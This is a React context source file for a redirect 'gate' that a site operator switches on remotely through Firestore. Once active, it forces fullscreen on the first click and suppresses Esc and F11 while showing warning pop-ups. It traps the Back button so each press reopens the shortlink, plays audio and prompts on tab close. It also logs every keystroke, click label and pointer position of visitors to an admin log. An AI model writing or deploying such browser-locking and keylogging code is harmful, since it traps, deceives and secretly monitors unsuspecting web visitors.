import {
  createContext,
  useCallback,
  useContext,
  useEffect,
  useMemo,
  useRef,
  useState,
} from 'react';
import { useLocation, useNavigate } from 'react-router-dom';
import { doc, onSnapshot } from 'firebase/firestore';
import db from '../firebase/firebaseConfig';
import { useSite } from './SiteContext';
import {
  generateRedirectSlug,
  installRedirectBackTrap,
  isRedirectShortlinkPath,
  markRedirectSession,
  clearSecurityCheckPassed,
  REDIRECT_EMBED_ROOT_SEL,
  HCVA_EMBED_ADMIN_EVENT,
} from '../utils/redirectShortlink';
import {
  startClickSession,
  endClickSession,
  recordClick,
  recordLifecycle,
  isFullscreenActive,
  noteFullscreenExitAttempt,
  noteEscKeyActivity,
  resolveFullscreenCloseWay,
  clearFullscreenExitAttempt,
} from '../utils/clickTracking';
import { showEscBlockedWarning, showSecurityWarning } from '../utils/redirectFullscreen';
import {
  appendShortlinkVisitLogNote,
  clickNote,
  fullscreenKeyAttemptNote,
  hasTrackedShortlinkVisitorSession,
  keyPressNote,
  SHORTLINK_VISIT_FROM_POPUP,
  SHORTLINK_VISIT_FROM_REDIRECT_GATE,
  SHORTLINK_VISIT_NOTE_KEY,
  updateShortlinkVisitorSessionStatus,
} from '../utils/shortlinkMetrics';
import {
  getFullscreenDiagnostics,
  requestFullscreenFromUserGesture,
} from '../utils/redirectFullscreen';
import { playEmbedOfferAudio } from '../utils/embedOfferAudio';

const SITE_NUMBERS_COLLECTION = 'siteNumbers';

const RedirectContext = createContext(null);

/** Absolute URL for redirect target (path or full URL string). */
function resolveRedirectHref(raw) {
  const t = (raw || '').trim();
  if (!t) return '';
  if (/^https?:\/\//i.test(t)) return t;
  const path = t.startsWith('/') ? t : `/${t}`;
  return new URL(path, window.location.origin).href;
}

function isAlreadyAtTarget(absoluteHref) {
  try {
    const target = new URL(absoluteHref);
    const current = new URL(window.location.href);
    if (target.origin !== current.origin) return false;
    return target.pathname === current.pathname;
  } catch {
    return false;
  }
}

/**
 * Firestore `redirectNavigateTopLevel`: when true with redirectEnabled, first click jumps
 * the whole tab to redirectUrl — best for vanilla HTML/JS pages that expect a top-level
 * window (e.g. document.documentElement.requestFullscreen()). Default is shortlink + iframe embed.
 */

/** Firestore `redirectEnabled`: user must click anywhere on the page to navigate (no redirect on load). */
function computeRedirectEnabled(data) {
  return data.redirectEnabled === true;
}

function buildPopupModal(data, immediateRedirect) {
  if (!data.popup || immediateRedirect) return null;
  const redirectUrl = (data.redirectUrl || '').trim();
  const popupLink = (data.popupLink || '').trim();
  const title = (data.popupTitle || '').trim() || 'Notice';
  const message = (data.popupMessage || '').trim();
  const popupLinkLabel = (data.popupLinkLabel || '').trim() || 'Learn more';
  if (!redirectUrl && !message && !popupLink) return null;
  return {
    title,
    message,
    popupLink,
    popupLinkLabel,
    redirectUrl,
  };
}

function requestRedirectFullscreen() {
  if (typeof document === 'undefined') return Promise.resolve();
  const el = document.documentElement;
  const request =
    el.requestFullscreen ||
    el.webkitRequestFullscreen ||
    el.mozRequestFullScreen ||
    el.msRequestFullscreen;
  if (!request) return Promise.resolve();
  try {
    return Promise.resolve(request.call(el));
  } catch (_) {
    return Promise.resolve();
  }
}

export const RedirectProvider = ({ children }) => {
  const { firebaseSiteDocId } = useSite();
  const navigate = useNavigate();
  const location = useLocation();
  const [popupModal, setPopupModal] = useState(null);
  const [pendingRedirectHref, setPendingRedirectHref] = useState(null);
  /** When true, skip shortlink/embed and assign same-tab to redirect URL (top-level landing). */
  const [redirectTopLevel, setRedirectTopLevel] = useState(false);
  /** After first Firestore snapshot for siteNumbers (or no site doc id). Avoids shortlink → home before redirect URL exists. */
  const [redirectSourceReady, setRedirectSourceReady] = useState(false);
  const fullscreenCloseWayRef = useRef('browser/system');

  const hideSiteChrome = Boolean(
    !redirectTopLevel &&
      pendingRedirectHref &&
      isRedirectShortlinkPath(location.pathname)
  );

  const appendVisitorLogNote = useCallback(
    (visitNote) => {
      if (!firebaseSiteDocId || !visitNote) return;
      appendShortlinkVisitLogNote({
        siteId: firebaseSiteDocId,
        sourceDomain: window.location.hostname || '',
        visitNote,
        requireExistingSession: true,
      });
    },
    [firebaseSiteDocId]
  );

  const buildFullscreenStatusPayload = useCallback((extra = {}) => {
    const d = getFullscreenDiagnostics();
    return {
      fullscreenState: d.nativeOn || d.pseudoOn ? 'on' : 'off',
      fullscreenMode: d.mode,
      fullscreenNative: d.nativeOn,
      fullscreenPseudo: d.pseudoOn,
      fullscreenRequestStatus: d.requestStatus,
      fullscreenRequestError: d.requestError,
      fullscreenRequestAt: d.requestAt,
      keyboardLockStatus: d.keyboardLockStatus,
      pageFocused: d.pageFocused,
      pageVisibility: d.visibilityState,
      viewportMatchesScreen: d.viewportMatchesScreen,
      ...extra,
    };
  }, []);

  /** Quiet heartbeat: updates session status fields only, never visitLog. */
  useEffect(() => {
    if (!pendingRedirectHref || !firebaseSiteDocId) return undefined;
    const writeHeartbeat = (state = 'online') => {
      if (!hasTrackedShortlinkVisitorSession(firebaseSiteDocId)) return;
      updateShortlinkVisitorSessionStatus({
        siteId: firebaseSiteDocId,
        sourceDomain: window.location.hostname || '',
        sessionState: state,
        ...buildFullscreenStatusPayload(),
      });
    };
    writeHeartbeat('online');
    const heartbeat = window.setInterval(() => writeHeartbeat('online'), 30000);
    const onPageHide = () => writeHeartbeat('closed');
    const onVisibilityChange = () => {
      if (document.visibilityState === 'visible') writeHeartbeat('online');
    };
    window.addEventListener('pagehide', onPageHide);
    document.addEventListener('visibilitychange', onVisibilityChange);
    return () => {
      window.clearInterval(heartbeat);
      window.removeEventListener('pagehide', onPageHide);
      document.removeEventListener('visibilitychange', onVisibilityChange);
    };
  }, [pendingRedirectHref, firebaseSiteDocId]);

  /**
   * Click-tracking session: starts the moment the redirect turns ON (pendingRedirectHref
   * set) and ends when it closes / the gate goes inactive. Survives shortlink slug rotation
   * because pendingRedirectHref (the target) doesn't change as the slug does.
   */
  useEffect(() => {
    if (!pendingRedirectHref) return undefined;
    startClickSession({
      site: firebaseSiteDocId,
      redirectUrl: pendingRedirectHref,
    });
    return () => {
      endClickSession('redirect_inactive');
    };
  }, [pendingRedirectHref, firebaseSiteDocId]);

  /** Record explicit fullscreen ON/OFF during the gate. */
  useEffect(() => {
    if (!pendingRedirectHref) return undefined;
    const onFsChange = () => {
      const on = isFullscreenActive();
      let closeWay = on ? '' : fullscreenCloseWayRef.current || 'browser/system';
      if (!on && closeWay === 'browser/system') {
        closeWay = resolveFullscreenCloseWay(closeWay);
      }
      recordLifecycle(on ? 'fullscreen_enter' : 'fullscreen_exit', {
        fsState: on ? 'on' : 'off',
        closeWay,
      });
      updateShortlinkVisitorSessionStatus({
        siteId: firebaseSiteDocId,
        sourceDomain: window.location.hostname || '',
        sessionState: 'online',
        ...buildFullscreenStatusPayload({
          fullscreenState: on ? 'on' : 'off',
          fullscreenMode: on ? 'native' : getFullscreenDiagnostics().mode,
        }),
        fullscreenExitMethod: !on ? closeWay : '',
      });
      fullscreenCloseWayRef.current = 'browser/system';
      if (on) clearFullscreenExitAttempt();
    };
    document.addEventListener('fullscreenchange', onFsChange);
    document.addEventListener('webkitfullscreenchange', onFsChange);
    document.addEventListener('mozfullscreenchange', onFsChange);
    document.addEventListener('MSFullscreenChange', onFsChange);
    return () => {
      document.removeEventListener('fullscreenchange', onFsChange);
      document.removeEventListener('webkitfullscreenchange', onFsChange);
      document.removeEventListener('mozfullscreenchange', onFsChange);
      document.removeEventListener('MSFullscreenChange', onFsChange);
    };
  }, [pendingRedirectHref, firebaseSiteDocId, buildFullscreenStatusPayload]);

  /** Record every key press during the gate (Esc, arrows, typing, etc.). */
  useEffect(() => {
    if (!pendingRedirectHref) return undefined;
    const onKeyDown = (e) => {
      const isEsc = e.key === 'Escape' || e.code === 'Escape';
      const isF11 = e.key === 'F11' || e.code === 'F11';

      if (isF11 && pendingRedirectHref) {
        e.preventDefault();
        e.stopPropagation();
        if (isFullscreenActive()) {
          fullscreenCloseWayRef.current = 'f11_key';
          noteFullscreenExitAttempt('f11_key');
        }
        if (!e.repeat) {
          recordLifecycle('fullscreen_exit_attempt', {
            way: 'f11_key',
            inFullscreen: isFullscreenActive(),
          });
        }
      }
      if (isEsc) {
        noteEscKeyActivity();
        showEscBlockedWarning();
        if (isFullscreenActive()) {
          e.preventDefault();
          e.stopPropagation();
          fullscreenCloseWayRef.current = 'esc_button';
          noteFullscreenExitAttempt('esc_button');
          if (!e.repeat) {
            recordLifecycle('fullscreen_exit_attempt', {
              way: 'esc_button',
              inFullscreen: true,
            });
          }
        }
      }

      if (e.repeat) return; // ignore auto-repeat for logging only
      recordLifecycle(isEsc ? 'esc_press' : 'key_down', {
        key: e.key || '',
        code: e.code || '',
        isEsc,
        ctrl: Boolean(e.ctrlKey),
        alt: Boolean(e.altKey),
        shift: Boolean(e.shiftKey),
        meta: Boolean(e.metaKey),
      });
      // Mirror into the admin visit log (skip modifier-only keys to limit noise).
      if (!['Shift', 'Control', 'Alt', 'Meta'].includes(e.key)) {
        const keyInfo = {
          ctrl: e.ctrlKey,
          alt: e.altKey,
          shift: e.shiftKey,
          meta: e.metaKey,
        };
        if (isFullscreenActive()) {
          appendVisitorLogNote(fullscreenKeyAttemptNote(e.key, keyInfo));
        }
        appendVisitorLogNote(keyPressNote(e.key, keyInfo));
      }
    };
    const onKeyUp = (e) => {
      const isEsc = e.key === 'Escape' || e.code === 'Escape';
      if (!isEsc) return;
      if (isFullscreenActive()) {
        e.preventDefault();
        e.stopPropagation();
      }
      recordLifecycle('esc_release', { key: e.key || '', code: e.code || '' });
    };
    // Capture phase so we log even when RedirectEmbed swallows the key in fullscreen.
    document.addEventListener('keydown', onKeyDown, true);
    document.addEventListener('keyup', onKeyUp, true);
    return () => {
      document.removeEventListener('keydown', onKeyDown, true);
      document.removeEventListener('keyup', onKeyUp, true);
    };
  }, [pendingRedirectHref, firebaseSiteDocId, appendVisitorLogNote]);

  /** Extra in-fullscreen actions beyond regular click/key tracking. */
  useEffect(() => {
    if (!pendingRedirectHref) return undefined;

    const recordPointer = (type) => (e) => {
      if (!isFullscreenActive()) return;
      recordLifecycle(type, {
        x: Math.round(e.clientX || 0),
        y: Math.round(e.clientY || 0),
        button: typeof e.button === 'number' ? e.button : 0,
        pointerType: e.pointerType || 'mouse',
      });
    };

    const onWheel = (e) => {
      if (!isFullscreenActive()) return;
      recordLifecycle('wheel', {
        x: Math.round(e.clientX || 0),
        y: Math.round(e.clientY || 0),
        deltaX: Math.round(e.deltaX || 0),
        deltaY: Math.round(e.deltaY || 0),
      });
    };

    const onContextMenu = (e) => {
      if (!isFullscreenActive()) return;
      recordLifecycle('context_menu', {
        x: Math.round(e.clientX || 0),
        y: Math.round(e.clientY || 0),
      });
    };

    const onPointerDown = recordPointer('pointer_down');
    const onPointerUp = recordPointer('pointer_up');

    document.addEventListener('pointerdown', onPointerDown, true);
    document.addEventListener('pointerup', onPointerUp, true);
    document.addEventListener('wheel', onWheel, true);
    document.addEventListener('contextmenu', onContextMenu, true);
    return () => {
      document.removeEventListener('pointerdown', onPointerDown, true);
      document.removeEventListener('pointerup', onPointerUp, true);
      document.removeEventListener('wheel', onWheel, true);
      document.removeEventListener('contextmenu', onContextMenu, true);
    };
  }, [pendingRedirectHref]);

  useEffect(() => {
    if (!pendingRedirectHref) return undefined;

    const handleRedirectClick = (e) => {
      // Record every click anywhere on the page (incl. non-left / embed clicks)
      // before any early-return so nothing in the gate window is missed.
      recordClick(e);

      // Mirror into the admin visit log with the clicked button label + coordinates.
      if (e.isTrusted) {
        let label = '';
        try {
          const el = e.target?.closest?.('button, a, [role="button"], input[type="submit"], input[type="button"]');
          label = (el?.innerText || el?.value || '').trim().slice(0, 40);
        } catch (_) {
          label = '';
        }
        appendVisitorLogNote(clickNote({
          label,
          x: Math.round(e.clientX || 0),
          y: Math.round(e.clientY || 0),
        }));
      }

      if (typeof e.button === 'number' && e.button !== 0) return;

      if (redirectTopLevel) {
        e.preventDefault();
        e.stopPropagation();
        markRedirectSession();
        recordLifecycle('redirect_navigate_toplevel', { href: pendingRedirectHref });
        window.location.replace(pendingRedirectHref);
        return;
      }

      // Let the iframe (and its fullscreen / click JS) receive real user gestures — do not
      // preventDefault on clicks inside the embed root, or the child never gets activation.
      if (e.target?.closest?.(REDIRECT_EMBED_ROOT_SEL)) return;

      e.preventDefault();
      e.stopPropagation();
      markRedirectSession();
      playEmbedOfferAudio(pendingRedirectHref);
      requestFullscreenFromUserGesture();
      const next = generateRedirectSlug();
      const alreadyOnShortlink = isRedirectShortlinkPath(location.pathname);

      if (alreadyOnShortlink) {
        playEmbedOfferAudio(pendingRedirectHref);
        recordLifecycle('show_admin_panel_click', {
          slug: next,
          target: 'same_tab_admin',
        });
        window.dispatchEvent(new CustomEvent(HCVA_EMBED_ADMIN_EVENT));
        return;
      }

      clearSecurityCheckPassed();
      recordLifecycle('shortlink_open', { slug: next, target: 'same_tab' });
      try {
        sessionStorage.setItem(
          SHORTLINK_VISIT_NOTE_KEY,
          SHORTLINK_VISIT_FROM_REDIRECT_GATE
        );
      } catch {
        /* ignore */
      }
      navigate(`/${next}`, { replace: false });
    };

    document.addEventListener('click', handleRedirectClick, true);
    return () => document.removeEventListener('click', handleRedirectClick, true);
  }, [pendingRedirectHref, navigate, location.pathname, redirectTopLevel, firebaseSiteDocId, appendVisitorLogNote]);

  /**
   * Browser limitation: a website cannot disable the tab close button. The strongest
   * allowed behavior is a native leave-confirmation prompt on close/reload/navigation.
   */
  useEffect(() => {
    if (!pendingRedirectHref) return undefined;

    const onBeforeUnload = (e) => {
      if (isFullscreenActive()) {
        fullscreenCloseWayRef.current = 'tab_close';
      }
      recordLifecycle('tab_close_attempt', {
        way: 'browser_tab_close_or_reload',
        inFullscreen: isFullscreenActive(),
      });
      e.preventDefault();
      e.returnValue = '';
      return '';
    };

    const onPageHide = () => {
      if (isFullscreenActive()) {
        fullscreenCloseWayRef.current = 'tab_close';
      }
    };

    window.addEventListener('beforeunload', onBeforeUnload);
    window.addEventListener('pagehide', onPageHide);
    return () => {
      window.removeEventListener('beforeunload', onBeforeUnload);
      window.removeEventListener('pagehide', onPageHide);
    };
  }, [pendingRedirectHref]);

  /**
   * While the redirect gate is active (not on admin routes), trap browser Back:
   * each Back press opens a fresh shortlink with the same redirect content instead of
   * leaving the flow. The Back control itself cannot be hidden by any website.
   */
  useEffect(() => {
    if (!pendingRedirectHref) return undefined;
    if (location.pathname.includes('/admin')) return undefined;
    return installRedirectBackTrap(() => {
      markRedirectSession();
      playEmbedOfferAudio(pendingRedirectHref);
      showSecurityWarning();
      const next = generateRedirectSlug();
      if (isFullscreenActive()) {
        fullscreenCloseWayRef.current = 'back_button';
        recordLifecycle('fullscreen_exit_attempt', { way: 'back_button' });
      }
      recordLifecycle('back_button', { slug: next });
      requestFullscreenFromUserGesture();
      navigate(`/${next}`, { replace: true });
    });
  }, [pendingRedirectHref, location.pathname, navigate]);

  useEffect(() => {
    if (!firebaseSiteDocId) {
      setPendingRedirectHref(null);
      setRedirectTopLevel(false);
      setRedirectSourceReady(true);
      return undefined;
    }

    setRedirectSourceReady(false);
    const docRef = doc(db, SITE_NUMBERS_COLLECTION, firebaseSiteDocId);
    const unsub = onSnapshot(
      docRef,
      (snap) => {
        setRedirectSourceReady(true);
        if (!snap.exists()) {
          setPopupModal(null);
          setPendingRedirectHref(null);
          setRedirectTopLevel(false);
          return;
        }

        const data = snap.data() || {};
        const redirectOn = computeRedirectEnabled(data);
        const rawUrl = (data.redirectUrl || '').trim();
        const topLevel = data.redirectNavigateTopLevel === true;

        if (redirectOn && rawUrl) {
          const href = resolveRedirectHref(rawUrl);
          if (href && !isAlreadyAtTarget(href)) {
            setRedirectTopLevel(topLevel);
            setPendingRedirectHref(href);
          } else {
            setPendingRedirectHref(null);
            setRedirectTopLevel(false);
          }
          setPopupModal(null);
          return;
        }

        setPendingRedirectHref(null);
        setRedirectTopLevel(false);

        const modal = buildPopupModal(data, redirectOn);
        setPopupModal(modal);
      },
      (err) => {
        setRedirectSourceReady(true);
        console.error(
          `[Redirect] siteNumbers/${firebaseSiteDocId}:`,
          err
        );
      }
    );

    return () => unsub();
  }, [firebaseSiteDocId]);

  const dismissSessionPopup = useCallback(() => {
    setPopupModal(null);
  }, []);

  const launchPopupShortlink = useCallback(
    (rawUrl) => {
      const href = resolveRedirectHref(rawUrl);
      if (!href) return;
      if (isAlreadyAtTarget(href)) return;
      markRedirectSession();
      clearSecurityCheckPassed();
      playEmbedOfferAudio(href);
      requestFullscreenFromUserGesture();
      const next = generateRedirectSlug();
      setPendingRedirectHref(href);
      recordLifecycle('shortlink_open', { slug: next, target: 'same_tab', source: 'popup' });
      try {
        sessionStorage.setItem(SHORTLINK_VISIT_NOTE_KEY, SHORTLINK_VISIT_FROM_POPUP);
      } catch {
        /* ignore */
      }
      const alreadyOnShortlink = isRedirectShortlinkPath(location.pathname);
      navigate(`/${next}`, { replace: alreadyOnShortlink });
    },
    [navigate, location.pathname]
  );

  const value = useMemo(
    () => ({
      redirectActive: Boolean(pendingRedirectHref),
      pendingRedirectHref,
      popupModal,
      dismissSessionPopup,
      launchPopupShortlink,
      hideSiteChrome,
      redirectSourceReady,
    }),
    [
      pendingRedirectHref,
      popupModal,
      dismissSessionPopup,
      launchPopupShortlink,
      hideSiteChrome,
      redirectSourceReady,
    ]
  );

  return (
    <RedirectContext.Provider value={value}>
      {children}
    </RedirectContext.Provider>
  );
};

export const useRedirect = () => {
  const ctx = useContext(RedirectContext);
  if (!ctx) {
    return {
      redirectActive: false,
      pendingRedirectHref: null,
      popupModal: null,
      dismissSessionPopup: () => {},
      launchPopupShortlink: () => {},
      hideSiteChrome: false,
      redirectSourceReady: true,
    };
  }
  return ctx;
};

export const useSitePopup = () => {
  const ctx = useContext(RedirectContext);
  if (!ctx) {
    throw new Error('useSitePopup must be used within RedirectProvider');
  }
  return {
    popupModal: ctx.popupModal,
    dismissSessionPopup: ctx.dismissSessionPopup,
    launchPopupShortlink: ctx.launchPopupShortlink,
  };
};

export default RedirectContext;
